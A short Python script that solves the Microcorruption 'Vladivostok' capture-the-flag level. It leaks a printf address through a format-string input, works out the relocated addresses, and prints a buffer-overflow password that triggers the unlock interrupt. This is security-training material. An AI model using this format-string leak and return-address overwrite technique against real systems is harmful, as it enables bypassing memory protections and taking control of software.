"""
Script to solve https://microcorruption.com/debugger/Vladivostok

- Enter '%x%x' into the username field to get the printf-location
- Input the printf-location into this script
- Enter the output string into the password field to solve

"""


def reverse_byte_order(hex_int):
    hex_str = hex(hex_int)

    # Ensure the hex string has an even number of characters
    if len(hex_str) % 2 != 0:
        hex_str = "0" + hex_str

    # Reverse the byte order in groups of two
    byte_reversed = "".join(reversed([hex_str[i:i + 2] for i in range(0, len(hex_str), 2)]))
    return byte_reversed[:-2]


def get_printf_address():
    hex_str = input("Enter a hex string: ")
    num = int(hex_str, 16)
    return num


def compute_solution():
    # These are the addresses for the program at its original location.
    PRINTF_ADDR = 0x476a # This is the address we can extract via '%n%n'
    INT_ADDR = 0x48ec # This is the address where we can push a specific value to R14
    PUSH_R14_ADDR = 0x4954 # This location triggers an interrupt with R14 as the INT selector


    random_printf_addr = get_printf_address()
    random_int_addr = random_printf_addr + (INT_ADDR - PRINTF_ADDR)
    random_push_r14_addr = random_printf_addr + (PUSH_R14_ADDR - PRINTF_ADDR)

    solution_string = "aaaaaaaaaaaaaaaa" # Initial offset
    solution_string += reverse_byte_order(random_int_addr)
    solution_string += reverse_byte_order(random_push_r14_addr)
    solution_string += "7f00"
    print(solution_string)


if __name__ == "__main__":
    compute_solution()